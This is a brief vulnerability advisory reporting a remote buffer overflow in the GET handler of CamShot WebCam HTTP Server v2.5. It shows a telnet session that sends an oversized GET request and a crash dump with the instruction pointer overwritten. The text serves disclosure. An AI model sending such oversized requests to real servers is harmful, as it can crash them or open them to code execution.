COMMAND

    CamShot WebCam HTTP Server

SYSTEMS AFFECTED

    CamShot WebCam HTTP Server v2.5 for Win9x/NT

PROBLEM

    CamShot is a Windows 95/98/NT web server that serves up web  pages
    containing time stamped images  captured from a video  camera. The
    images  can  be  viewed  from  anywhere  on the network with a web
    browser.  CamShot  works with Video  For Windows compatible  video
    equipment.   Finally  a  cheap   and  simple  way  to  do   remote
    surveillance is here!.

    UssrLabs  found  a  local/remote  Buffer  overflow.  The code that
    handles  GET  commands  has  an  unchecked  buffer that will allow
    arbitrary code to be executed if it is overflowed.  Example:

        [hell@imahacker]$ telnet die.communitech.net 80
        Trying example.com...
        Connected to die.communitech.net
        Escape character is '^]'.
        GET (buffer) HTTP/1.1 <enter><enter>

    Where [buffer] is aprox. 2000 characters. At his point the  server
    overflows.  And  in remote machine  someone will be  see something
    like this:

    CAMSHOT caused an invalid page fault in
    module <unknown> at 0000:61616161.
    Registers:
    EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
    EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
    ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
    EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
    Bytes at CS:EIP:
    
    Stack dump:
    bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
    005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

    Binary or source for this Exploit (when finished):

        http://www.ussrback.com/

SOLUTION

    Nothing yet, but vendor has been informed.